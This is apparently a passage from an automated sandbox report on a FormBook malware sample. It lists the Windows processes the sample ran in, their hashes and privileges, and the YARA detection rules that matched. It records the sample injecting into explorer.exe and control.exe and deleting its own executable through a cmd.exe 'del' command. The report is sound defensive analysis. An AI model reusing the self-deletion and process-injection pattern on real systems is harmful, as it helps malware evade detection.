                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 08:45:24
Start date: 22/07/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 08:45:43
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\control.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\control.exe
Imagebase: 0x110000
File size: 114688 bytes
MD5 hash: 40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 08:45:48
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\mal.exe'
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:45:48
Start date: 22/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis